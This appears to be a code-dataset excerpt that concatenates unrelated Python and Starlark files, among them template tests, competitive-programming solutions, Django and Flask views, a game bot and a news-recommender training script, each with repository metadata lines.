template=r"{% unless false %}foo{% endunless %}",
expect="foo",
),
Case(
description="literal true condition",
template=r"{% unless true %}foo{% endunless %}",
expect="",
),
Case(
description="blocks that contain only whitespace are not rendered",
template=r"{% unless false %} {% endunless %}",
expect="",
),
Case(
description="alternative block",
template=r"{% unless true %}foo{% else %}bar{% endunless %}",
expect="bar",
),
Case(
description="conditional alternative block",
template=r"{% unless true %}foo{% elsif true %}bar{% endunless %}",
expect="bar",
),
Case(
description="conditional alternative block with default",
template=(
r"{% unless true %}foo"
r"{% elsif false %}bar"
r"{% else %}hello"
r"{% endunless %}"
),
expect="hello",
),
]
| 2.28125 | 2 |
Contest/ABC001/b/main.py | mpses/AtCoder | 0 | 12770810 | <reponame>mpses/AtCoder<gh_stars>0
#!/usr/bin/env python3
m = int(input())
if m < 100:
print("00")
elif m <= 5000:
print(str(m//100).zfill(2))
elif m <= 30000:
print(m//1000 + 50)
elif m <= 70000:
print((m//1000 - 30)//5 + 80)
else:
print(89) | 3.15625 | 3 |
algorithms/math/modular_exponentiation.py | jainrocky/python-ds | 1,723 | 12770811 | # to compute modular power
# Iterative Function to calculate
# (x^y)%p in O(log y)
def power(x, y, p) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % p
while (y > 0) :
# If y is odd, multiply
# x with result
if ((y & 1) == 1) :
res = (res * x) % p
# y must be even now
y = y >> 1 # y = y/2
x = (x * x) % p
return res | 3.953125 | 4 |
tests/test_basics.py | leuchtum/folderman | 0 | 12770812 | <gh_stars>0
import pytest
from folderman import Folder
def test_root_path():
pass
| 1.085938 | 1 |
players/cheating_idiot_player.py | timotree3/hanabi-1 | 25 | 12770813 | """A despicable Hanabi player.
Cheating Idiot never hints. He peeks at his cards. When he has a play, he
picks one randomly. When he doesn't, he discards randomly.
"""
from hanabi_classes import *
from bot_utils import get_plays
class CheatingIdiotPlayer(AIPlayer):
@classmethod
def get_name(cls):
return 'idiot'
def __init__(self, *args):
"""Can be overridden to perform initialization, but must call super"""
super(CheatingIdiotPlayer, self).__init__(*args)
def play(self, r):
cards = r.h[r.whoseTurn].cards
progress = r.progress
playableCards = get_plays(cards, progress)
if playableCards == []:
return 'discard', random.choice(cards)
else:
return 'play', random.choice(playableCards)
def end_game_logging(self):
"""Can be overridden to perform logging at the end of the game"""
pass
| 3.140625 | 3 |
gpscraper/forms/permissions.py | alverelt/gpscraper | 1 | 12770814 | import json
def permissions(app_id):
form = {
'f.req': [[[
'xdSrCf',
f'[[null,["{app_id}",7],[]]]',
None,
'1'
]]]
}
form['f.req'] = json.dumps(form['f.req'], separators=(',', ':'))
return form | 2.1875 | 2 |
radicalsdk/radar/v1_constants.py | moodoki/radical_sdk | 7 | 12770815 | import os
import numpy as np
class TupperwearD435_0:
F = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/f_matrix.npy'))
P = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/p_matrix_original.npy'))
class TupperwearD435:
F = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/f_matrix.npy'))
P = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/p_matrix.npy'))
| 2.46875 | 2 |
src/pykeen/evaluation/__init__.py | camillepradel/pykeen | 2 | 12770816 | # -*- coding: utf-8 -*-
"""Evaluators.
========= =============================================
Name Reference
========= =============================================
rankbased :class:`pykeen.evaluation.RankBasedEvaluator`
sklearn :class:`pykeen.evaluation.SklearnEvaluator`
========= =============================================
.. note:: This table can be re-generated with ``pykeen ls evaluators -f rst``
========= =================================================
Name Reference
========= =================================================
rankbased :class:`pykeen.evaluation.RankBasedMetricResults`
sklearn :class:`pykeen.evaluation.SklearnMetricResults`
========= =================================================
.. note:: This table can be re-generated with ``pykeen ls metrics -f rst``
References
----------
.. [berrendorf2020] <NAME>, <NAME>, <NAME>, <NAME> (2020) `Interpretable and Fair
Comparison of Link Prediction or Entity Alignment Methods with Adjusted Mean Rank
<https://arxiv.org/abs/2002.06914>`_.
"""
import dataclasses
from typing import Mapping, Set, Type, Union
from .evaluator import Evaluator, MetricResults, evaluate
from .rank_based_evaluator import RankBasedEvaluator, RankBasedMetricResults
from .sklearn import SklearnEvaluator, SklearnMetricResults
from ..utils import get_cls, normalize_string
__all__ = [
'evaluate',
'Evaluator',
'MetricResults',
'RankBasedEvaluator',
'RankBasedMetricResults',
'SklearnEvaluator',
'SklearnMetricResults',
'metrics',
'evaluators',
'get_evaluator_cls',
'get_metric_list',
]
_EVALUATOR_SUFFIX = 'Evaluator'
_EVALUATORS: Set[Type[Evaluator]] = {
RankBasedEvaluator,
SklearnEvaluator,
}
#: A mapping of evaluators' names to their implementations
evaluators: Mapping[str, Type[Evaluator]] = {
normalize_string(cls.__name__, suffix=_EVALUATOR_SUFFIX): cls
for cls in _EVALUATORS
}
def get_evaluator_cls(query: Union[None, str, Type[Evaluator]]) -> Type[Evaluator]:
"""Get the evaluator class."""
return get_cls(
query,
base=Evaluator,
lookup_dict=evaluators,
default=RankBasedEvaluator,
suffix=_EVALUATOR_SUFFIX,
)
_METRICS_SUFFIX = 'MetricResults'
_METRICS: Set[Type[MetricResults]] = {
RankBasedMetricResults,
SklearnMetricResults,
}
#: A mapping of results' names to their implementations
metrics: Mapping[str, Type[MetricResults]] = {
normalize_string(cls.__name__, suffix=_METRICS_SUFFIX): cls
for cls in _METRICS
}
def get_metric_list():
"""Get info about all metrics across all evaluators."""
return [
(field, name, value)
for name, value in metrics.items()
for field in dataclasses.fields(value)
]
| 1.71875 | 2 |
api/urls.py | NiklasMerz/shoppinglist | 0 | 12770817 | <reponame>NiklasMerz/shoppinglist
from django.urls import include, path
from rest_framework import routers
from api import views
from rest_framework.schemas import get_schema_view
router = routers.DefaultRouter()
router.register(r'lists', views.ListViewSet)
router.register(r'catalogitems', views.CatalogItemViewSet)
router.register(r'items', views.ItemViewSet)
router.register(r'stores', views.StoreViewSet)
router.register(r'trips', views.TripViewSet)
router.register(r'checkouts', views.CheckoutViewSet)
router.register(r'receipts', views.ReceiptViewSet)
router.register(r'lineitems', views.LineItemsViewSet)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
path('', include(router.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('openapi', get_schema_view(
title='Shopping Advanced',
description='API for mobile apps',
version="'0.0.1'"
), name='openapi-schema'),
# Non-openapi endpoints
path('file-receipt/json', views.ReceiptDataView.as_view(), name='file-receipt/json'),
path('file-receipt/image', views.ReceiptImageView.as_view(), name='file-receipt/image'),
] | 2.109375 | 2 |
tally_ho/apps/tally/views/home.py | onaio/tally-ho | 12 | 12770818 | from django.urls import reverse
from django.shortcuts import redirect, render
from django.views.generic import TemplateView
from guardian.mixins import LoginRequiredMixin
from tally_ho.libs.permissions import groups
from tally_ho.apps.tally.models import UserProfile
GROUP_URLS = {
groups.AUDIT_CLERK: "audit",
groups.AUDIT_SUPERVISOR: "audit",
groups.CLEARANCE_CLERK: "clearance",
groups.CLEARANCE_SUPERVISOR: "clearance",
groups.CORRECTIONS_CLERK: "corrections",
groups.DATA_ENTRY_1_CLERK: "data-entry",
groups.DATA_ENTRY_2_CLERK: "data-entry",
groups.INTAKE_CLERK: "intake",
groups.INTAKE_SUPERVISOR: "intake",
groups.QUALITY_CONTROL_CLERK: "quality-control",
groups.QUALITY_CONTROL_SUPERVISOR: "quality-control",
groups.SUPER_ADMINISTRATOR: "super-administrator-tallies",
groups.TALLY_MANAGER: "tally-manager",
}
def permission_denied(request):
return render(request, 'errors/403.html')
def not_found(request):
return render(request, 'errors/404.html')
def bad_request(request):
return render(request, 'errors/400.html')
def server_error(request):
return render(request, 'errors/500.html')
def suspicious_error(request):
error_message = request.session.get('error_message')
if error_message:
del request.session['error_message']
return render(request,
'errors/suspicious.html',
{'error_message': error_message})
def get_user_role_url(user):
if user.groups.count():
user_group = user.groups.all()[0]
kwargs = {}
if user_group.name not in [groups.TALLY_MANAGER,
groups.SUPER_ADMINISTRATOR]:
userprofile = UserProfile.objects.get(id=user.id)
if not userprofile.tally:
return reverse('home-no-tally')
kwargs = {'tally_id': userprofile.tally.id}
return reverse(GROUP_URLS.get(user_group.name), kwargs=kwargs)
return None
class HomeView(LoginRequiredMixin, TemplateView):
template_name = "home.html"
def redirect_user_to_role_view(self):
user = self.request.user
redirect_url = get_user_role_url(user)
if redirect_url:
return redirect(redirect_url)
return None
def dispatch(self, request, *args, **kwargs):
self.request = request
redirect_response = self.redirect_user_to_role_view()
if redirect_response:
return redirect_response
return super(HomeView, self).dispatch(request, *args, **kwargs)
class LocaleView(TemplateView):
def get(self, *args, **kwargs):
get_data = self.request.GET
locale = get_data.get('locale')
if locale:
self.request.session['locale'] = locale
self.request.session['django_language'] = locale
next_url = get_data.get('next', 'home')
if not len(next_url) or next_url.startswith('locale'):
next_url = 'home'
return redirect(next_url)
class NoTallyView(LoginRequiredMixin, TemplateView):
template_name = "no_tally_assigned.html"
| 1.859375 | 2 |
name_recommender/pipeline/run_lstm_model.py | lassevalentini/NameRecommender | 0 | 12770819 | <gh_stars>0
import json
import joblib
from azureml.core.model import Model
# Called when the service is loaded
def init():
global model
# Get the path to the deployed model file and load it
model_path = Model.get_model_path("name_lstm")
model = joblib.load(model_path)
# Called when a request is received
def run(raw_data):
# Get the input data as a numpy array
input = json.loads(raw_data)
if input is list:
max_id = max(input)
expanded_list = [model.make_recommendation() for _ in range(max_id)]
predictions = [expanded_list[i] for i in input]
else:
predictions = [model.make_recommendation() for _ in range(input)]
# Return the predictions as JSON
return json.dumps(predictions)
| 2.875 | 3 |
asset/api.py | 745184532/cmdb | 251 | 12770820 | from rest_framework import generics
from .models import AssetInfo
from .serializers import AssetSerializer
from rest_framework import permissions
class AssetList(generics.ListCreateAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
class AssetDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
| 1.960938 | 2 |
chaussette/_paste.py | ProzorroUKR/chaussette | 74 | 12770821 | <gh_stars>10-100
import os
from six.moves import configparser
from logging.config import fileConfig
try:
from paste.deploy import loadapp
except ImportError:
raise ImportError("You need to install PasteDeploy")
def paste_app(path):
# Load the logging config from paste.deploy .ini, if any
path, hsh, app = path.partition('#')
parser = configparser.ConfigParser()
parser.read([path])
if parser.has_section('loggers'):
config_file = os.path.abspath(path)
fileConfig(
config_file,
dict(__file__=config_file, here=os.path.dirname(config_file))
)
return loadapp('config:%s%s%s' % (os.path.abspath(path), hsh, app))
| 2.375 | 2 |
backend/bitcoin_arbitrage/api/views.py | landdafku11/cryptocurrencybot | 1 | 12770822 | <reponame>landdafku11/cryptocurrencybot
import logging
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bitcoin_arbitrage.models import Spread, Tri_Spread
from bitcoin_arbitrage.api.mixins import MonitorMixin
from .serializers import (
ActionSerialier,
serialize_change
)
logger = logging.getLogger(__name__)
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
# Spread endpoints.
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
class RealTimeSpreadEndpoint(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
try:
all_spreads = []
for spread in Spread.objects.all().order_by('-recorded_date')[:5]:
xchange_buy = spread.xchange_buy
xchange_sell = spread.xchange_sell
all_spreads.append({
"id": spread.pk,
"exchange_buy_id": spread.exchange_buy_id,
"exchange_sell_id": spread.exchange_sell_id,
"xchange_buy": serialize_change(xchange_buy),
"xchange_sell": serialize_change(xchange_sell),
"recorded_date": spread.recorded_date,
"spread": spread.spread
})
except Exception as error:
logger.exception(str(error))
return Response({"status": "error"}, status=400)
return Response({"spreads": all_spreads}, status=200)
class TriSpread(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
try:
tri_spreads = []
for spread in Tri_Spread.objects.all().order_by('-recorded_date'):
tri_xchange_buy1 = spread.tri_xchange_buy1
tri_xchange_buy2 = spread.tri_xchange_buy2
tri_xchange_sell = spread.tri_xchange_sell
tri_spreads.append({
"id": spread.pk,
"tri_exchange_buy1_id": spread.tri_exchange_buy1_id,
"tri_exchange_sell_id": spread.tri_exchange_sell_id,
"tri_exchange_buy2_id": spread.tri_exchange_buy2_id,
"tri_xchange_buy1": serialize_change(tri_xchange_buy1),
"tri_xchange_buy2": serialize_change(tri_xchange_buy2),
"tri_xchange_sell": serialize_change(tri_xchange_sell),
"recorded_date": spread.recorded_date,
"tri_spread": spread.tri_spread
})
except Exception as error:
logger.exception(str(error))
return Response({"status": "error"}, status=400)
return Response({"tri_spreads": tri_spreads}, status=200)
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
# Monitor Endpoints
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
class TriangularMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "trinangular_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_tri",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
class InterExchangeMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "inter_exchange_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_tri",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
class StrategyBacktestMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "strategy_back_test_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_backtest",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "success"}, status=200)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
| 2.078125 | 2 |
utils/slack_msg_fmt.py | angeleneleow/rocket2 | 14 | 12770823 | <filename>utils/slack_msg_fmt.py
"""Utility class for formatting Slack Messages."""
def wrap_slack_code(str):
"""Format code."""
return f"`{str}`"
def wrap_code_block(str):
"""Format code block."""
return f"```\n{str}\n```"
def wrap_quote(str):
"""Format quote."""
return f"> {str}\n"
def wrap_emph(str):
"""Format emph."""
return f"*{str}*"
| 2.171875 | 2 |
transparentai_ui/app/controllers/projects.py | Nathanlauga/transparentai-ui | 1 | 12770824 | from flask import request, render_template, redirect, url_for, session, jsonify, abort
from flask_babel import _
import os.path
import pandas as pd
from transparentai import sustainable
from ..models import Project
from ..models.modules import ModuleSustainable
from .services.projects import format_project, control_project, load_modules, init_anwsers
from .services.modules import sustainable as sustainable_module
from .services.commons import get_header_attributes
from .controller_class import Controller
from ..utils import add_in_db, exists_in_db
from ..src import get_questions
project_controller = Controller(component=Project,
format_fn=format_project,
control_fn=control_project,
module_fn=load_modules)
sustainable_controller = Controller(
component=ModuleSustainable,
format_fn=sustainable_module.format_module,
control_fn=sustainable_module.control_module)
def index():
title = _('Projects')
header = get_header_attributes()
projects = project_controller.index()
return render_template("projects/index.html",
title=title,
session=session,
projects=projects,
header=header)
def get_all_instances_json():
projects = project_controller.index()
projects = [elem.to_dict() for elem in projects]
return jsonify(projects)
def new():
title = _('Create a new project')
header = get_header_attributes()
previous = request.form
if request.method == 'POST':
project = project_controller.create()
init_anwsers(project)
if project is not None:
return redirect(url_for('projects.get_instance',
name=project.name))
return render_template("projects/new.html",
title=title,
session=session,
header=header,
previous=previous)
def edit(name):
title = _('Edit ') + name
header = get_header_attributes()
project = project_controller.get_instance(name)
previous = project.to_dict()
# Temporary until handle list in form
previous['members'] = ', '.join(previous['members'])
if request.method == 'POST':
previous = request.form
project = project_controller.update(name)
if project is not None:
return redirect(url_for('projects.get_instance',
name=project.name))
return render_template("projects/edit.html",
title=title,
session=session,
header=header,
previous=previous,
project=project)
def get_instance(name):
project = project_controller.get_instance(name)
if project is None:
return redirect(url_for('projects.index'))
title = name
header = get_header_attributes()
header['current_project'] = name
questions = get_questions()
return render_template("projects/instance.html",
session=session,
project=project,
header=header,
title=title,
questions=questions)
def get_instance_json(name):
project = project_controller.get_instance(name)
return jsonify(project.to_dict())
def create():
project = project_controller.create()
init_anwsers(project)
return redirect(url_for('projects.index'))
def update(name):
project_controller.update(name)
return redirect(url_for('projects.get_instance', name=name))
def delete(name):
project_controller.delete(name)
return redirect(url_for('projects.index'))
def post_instance(name):
form_data = request.form
if '_method' not in form_data:
return redirect(url_for('projects.get_instance', name=name))
method = form_data['_method']
if method == 'POST':
return create()
elif method == 'PUT':
return update(name)
elif method == 'DELETE':
return delete(name)
return redirect(url_for('projects.get_instance', name=name))
def estimate_co2(name):
title = _('Estimate CO2: ') + name
header = get_header_attributes()
project = project_controller.get_instance(name)
if project is not None:
header['current_project'] = project.name
module = project.module_sustainable
if module is None:
return abort(404)
previous = module.to_dict()
if request.method == 'POST':
previous = request.form
module = sustainable_controller.update(module.id, id_col='id')
if module is not None:
sustainable_module.compute_co2_estimation(project)
return redirect(url_for('projects.estimate_co2', name=name))
locations = list(sustainable.get_energy_data().keys())
return render_template("modules/estimate_co2.html",
session=session,
previous=previous,
header=header,
title=title,
project=project,
locations=locations)
def modules(name):
title = _('Analytics libraries')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
return render_template("projects/modules/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model)
def components(name):
title = _('Project components')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
return render_template("projects/components/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model)
def evaluation(name):
title = _('Trusting evaluation')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
questions = get_questions()
return render_template("projects/evaluation/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model,
questions=questions)
def model(name):
return redirect(url_for('models.get_instance', name=name))
def dataset(name):
return redirect(url_for('datasets.get_instance', name=name))
| 2.40625 | 2 |
languages/python/2.learn_more_py_the_hard_way/ex06/find.py | banminkyoz/learn | 4 | 12770825 | <filename>languages/python/2.learn_more_py_the_hard_way/ex06/find.py
from sys import exit
import argparse
import os.path
import re
class Find:
args = ()
result_count = 0
def __init__(self):
self.get_arguments()
self.check_arguments()
self.search()
def get_arguments(self):
parser = argparse.ArgumentParser(description='Find file(s) or folder(s)')
parser.add_argument('searchDir', metavar="Search Directory", help="Directory to start search from")
parser.add_argument('searchContent', metavar="Search Content", help="File, Directory name or Regex")
parser.add_argument("--type", "-t", metavar='type', help="Type (d: Directory or f: File)", default="f")
self.args = parser.parse_args()
def check_arguments(self):
if not os.path.isdir(self.args.searchDir):
print("Directory is not exist")
exit(1)
def search(self):
self.result_count = 0
for root, dirs, files in os.walk(self.args.searchDir):
if self.args.type == "f":
self.print_result(files)
else:
self.print_result(dirs)
if self.result_count == 0:
print("No result found !")
def print_result(self, list):
for item in list:
if re.search(self.args.searchContent, item):
self.result_count += 1
print(item)
find = Find()
| 3.578125 | 4 |
python/constants.py | raymonshansen/dungeon | 4 | 12770826 | import pygame as pg
TILE_D = 32
# Comment in for small or big screen
# HD screen
SCREEN_TW, SCREEN_TH = 50, 30
# Low res screen
SCREEN_TW, SCREEN_TH = 35, 20
SCREEN_W_PX = SCREEN_TW * TILE_D
SCREEN_H_PX = SCREEN_TH * TILE_D
SCREEN_SIZE = (SCREEN_W_PX, SCREEN_H_PX)
MAP_VIEW_TW = int(SCREEN_TW * 0.7)
MAP_VIEW_TH = int(SCREEN_TH * 0.8)
STAT_VIEW_TW = MAP_VIEW_TW
STAT_VIEW_TH = SCREEN_TH - MAP_VIEW_TH
LOG_VIEW_TW = SCREEN_TW - MAP_VIEW_TW
LOG_VIEW_TH = SCREEN_TH
MAP_DIM = (TILE_D*MAP_VIEW_TW, TILE_D*MAP_VIEW_TH)
STAT_DIM = (TILE_D*STAT_VIEW_TW, TILE_D*STAT_VIEW_TH)
LOG_DIM = (TILE_D*LOG_VIEW_TW, TILE_D*LOG_VIEW_TH)
MAP_POS = pg.Rect(0, 0, MAP_DIM[0], MAP_DIM[1])
STAT_POS = pg.Rect(0, TILE_D*MAP_VIEW_TH, STAT_DIM[0], STAT_DIM[1])
LOG_POS = pg.Rect(TILE_D*MAP_VIEW_TW, 0, LOG_DIM[0], LOG_DIM[1])
DIRECTIONS = {'NW': (-1, -1),
'N': (0, -1),
'NE': (1, -1),
'W': (-1, 0),
'E': (1, 0),
'SW': (-1, 1),
'S': (0, 1),
'SE': (1, 1)}
FOUR_DIRECTIONS = {'N': (0, -1),
'W': (-1, 0),
'E': (1, 0),
'S': (0, 1)}
# Font
LOG_FONTSIZE = TILE_D // 2
# Main Menu
MAINMENU_ITEM_LABELS = ["Resume",
"Editor",
"Quit",
]
MAINMENU_ITEM_INFO = ["Resume the game.",
"Switch between 'Game' and 'Editor' mode. This is a future feature not yet implemented.",
"Quit the game. Without saving.",
]
MAINMENU_FONTSIZE = TILE_D * 2
MAINMENU_BGCOL = pg.color.Color("black")
MAINMENU_DEFAULT_COL = pg.color.Color("antiquewhite")
MAINMENU_SELECTED_COL = pg.color.Color("goldenrod")
| 2.5 | 2 |
data_collection/gazette/spiders/sc_pescaria_brava.py | kaiocp/querido-diario | 454 | 12770827 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScPescariaBravaSpider(FecamGazetteSpider):
name = "sc_pescaria_brava"
FECAM_QUERY = 'entidade:"Prefeitura Municipal de Pescaria Brava"'
TERRITORY_ID = "4212650"
| 1.375 | 1 |
testa_usuario.py | ecompfin-ufrgs/economia_computacional1 | 2 | 12770828 | <filename>testa_usuario.py
"""
Programa 2
Descrição: Este programa pede a entrada de dados pelo usuário
até que o dado seja do tipo adequado.
Autor: <NAME>
Versão: 0.0.1
"""
# Entrada
# Atribuição de variáveis: usuários do sistema
usuario1 = "nelson"
usuario2 = "joao"
usuario3 = "juan"
usuario4 = "nathan"
while True:
usuario = input("\nQual o seu nome de usuário?")
if usuario == usuario1:
print(f"\nBenvindo ao sistema, {usuario1}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario2}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario3}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario4}")
break
else:
print("\nUsuário inválido. Tente novamente!")
# Processamento
# Saída
| 3.625 | 4 |
tests/test_nrms/test_nrms.py | ParticleMedia/recommenders | 0 | 12770829 | """Global settings and imports"""
import sys
sys.path.append("../../")
import os
import numpy as np
import zipfile
from tqdm import tqdm
import scrapbook as sb
from tempfile import TemporaryDirectory
import tensorflow as tf
tf.get_logger().setLevel('ERROR') # only show error messages
from reco_utils.recommender.deeprec.deeprec_utils import download_deeprec_resources
from reco_utils.recommender.newsrec.newsrec_utils import prepare_hparams
from reco_utils.recommender.newsrec.models.nrms import NRMSModel
from reco_utils.recommender.newsrec.io.mind_iterator import MINDIterator
from reco_utils.recommender.newsrec.newsrec_utils import get_mind_data_set
print("System version: {}".format(sys.version))
print("Tensorflow version: {}".format(tf.__version__))
"""Prepare parameters"""
epochs = 5
seed = 42
batch_size = 32
# Options: demo, small, large
MIND_type = 'demo'
"""Download and load data"""
tmpdir = TemporaryDirectory()
data_path = tmpdir.name
train_news_file = os.path.join(data_path, 'train', r'news.tsv')
train_behaviors_file = os.path.join(data_path, 'train', r'behaviors.tsv')
valid_news_file = os.path.join(data_path, 'valid', r'news.tsv')
valid_behaviors_file = os.path.join(data_path, 'valid', r'behaviors.tsv')
wordEmb_file = os.path.join(data_path, "utils", "embedding.npy")
userDict_file = os.path.join(data_path, "utils", "uid2index.pkl")
wordDict_file = os.path.join(data_path, "utils", "word_dict.pkl")
yaml_file = os.path.join(data_path, "utils", r'nrms.yaml')
mind_url, mind_train_dataset, mind_dev_dataset, mind_utils = get_mind_data_set(MIND_type)
if not os.path.exists(train_news_file):
download_deeprec_resources(mind_url, os.path.join(data_path, 'train'), mind_train_dataset)
if not os.path.exists(valid_news_file):
download_deeprec_resources(mind_url, \
os.path.join(data_path, 'valid'), mind_dev_dataset)
if not os.path.exists(yaml_file):
download_deeprec_resources(r'https://recodatasets.z20.web.core.windows.net/newsrec/', \
os.path.join(data_path, 'utils'), mind_utils)
"""Create hyper-parameters"""
hparams = prepare_hparams(yaml_file,
wordEmb_file=wordEmb_file,
wordDict_file=wordDict_file,
userDict_file=userDict_file,
batch_size=batch_size,
epochs=epochs,
show_step=10)
print(hparams)
"""Train the NRMS model"""
iterator = MINDIterator
model = NRMSModel(hparams, iterator, seed=seed)
print(model.run_eval(valid_news_file, valid_behaviors_file))
model.fit(train_news_file, train_behaviors_file, valid_news_file, valid_behaviors_file)
res_syn = model.run_eval(valid_news_file, valid_behaviors_file)
print(res_syn)
sb.glue("res_syn", res_syn)
"""Save the model"""
model_path = os.path.join(data_path, "model")
os.makedirs(model_path, exist_ok=True)
model.model.save_weights(os.path.join(model_path, "nrms_ckpt"))
"""Output Predcition File"""
group_impr_indexes, group_labels, group_preds = model.run_fast_eval(valid_news_file, valid_behaviors_file)
with open(os.path.join(data_path, 'prediction.txt'), 'w') as f:
for impr_index, preds in tqdm(zip(group_impr_indexes, group_preds)):
impr_index += 1
pred_rank = (np.argsort(np.argsort(preds)[::-1]) + 1).tolist()
pred_rank = '[' + ','.join([str(i) for i in pred_rank]) + ']'
f.write(' '.join([str(impr_index), pred_rank])+ '\n')
f = zipfile.ZipFile(os.path.join(data_path, 'prediction.zip'), 'w', zipfile.ZIP_DEFLATED)
f.write(os.path.join(data_path, 'prediction.txt'), arcname='prediction.txt')
f.close()
| 1.898438 | 2 |
tests/analysis/test_pearson_integration.py | AISyLab/side-channel-attacks | 14 | 12770830 | <gh_stars>10-100
import unittest
import os.path
import numpy as np
from sca.__main__ import CONST_DEFAULT_PLAIN_FILE
from sca.__main__ import CONST_DEFAULT_TRACES_FILE
from sca.__main__ import CONST_DEFAULT_KEYS_FILE
from sca.analysis.pearson import Pearson
class TestPearsonIntegration(unittest.TestCase):
"""Tests the whole Pearson class."""
def test_pearson(self):
""""Test if pearson creates the correct file when ran"""
Pearson.run(np.load(CONST_DEFAULT_TRACES_FILE)[:10000],
np.load(CONST_DEFAULT_KEYS_FILE),
np.load(CONST_DEFAULT_PLAIN_FILE), 5, False, 0, 1, 0)
self.assertTrue(os.path.isfile('out/pearson_correlation_selected_indices.npy'))
def test_pearson_save_trace(self):
""""Test if pearson creates the correct file when ran"""
Pearson.run(np.load(CONST_DEFAULT_TRACES_FILE)[:10000],
np.load(CONST_DEFAULT_KEYS_FILE),
np.load(CONST_DEFAULT_PLAIN_FILE), 5, True, 0, 1, 0)
self.assertTrue(os.path.isfile('out/pearson_correlation_selected_traces.npy'))
| 2.40625 | 2 |
file_handling/excepation handling program test/print_excepation_information_in_msg.class_program.py | swarajRaut01/Python | 0 | 12770831 | <reponame>swarajRaut01/Python
#print excepation information as a msg in program
try:
print(10/0)
except ZeroDivisionError as msg:
print("the type of error:",msg.__class__)
| 2.859375 | 3 |
Linguagens/Python/Exercicios/cursos_em_video/aulas-22_23/107.py | rafaelvizu/Estudos | 0 | 12770832 | <filename>Linguagens/Python/Exercicios/cursos_em_video/aulas-22_23/107.py<gh_stars>0
from pacotes import ex107
print('\033[36;40mExercício Python #107 - Exercitando módulos em Python\033[m\n')
v = float(input('Digite o preço: R$'))
print(f'\nA metade de {v} é R${ex107.metade(v)}')
print(f'O dobro de {v} é R${ex107.dobro(v)}')
print(f'Aumentando 10%, temos R${ex107.aumentar(v, 10)}')
print(f'Reduzindo 13%, temos R${ex107.diminuir(v, 13)}') | 3.265625 | 3 |
java/aspects/checkstyle_aspect/defs.bzl | birkland/dwtj_rules_java | 0 | 12770833 | '''Defines the `checkstyle_aspect`.
'''
load("//java:providers/JavaCompilationInfo.bzl", "JavaCompilationInfo")
load(
"//java:common/extract/toolchain_info.bzl",
"extract_java_runtime_toolchain_class_path_separator",
"extract_checkstyle_toolchain_info",
)
_JAVA_RUNTIME_TOOLCHAIN_TYPE = "@dwtj_rules_java//java/toolchains/java_runtime_toolchain:toolchain_type"
CheckstyleAspectInfo = provider(
fields = {
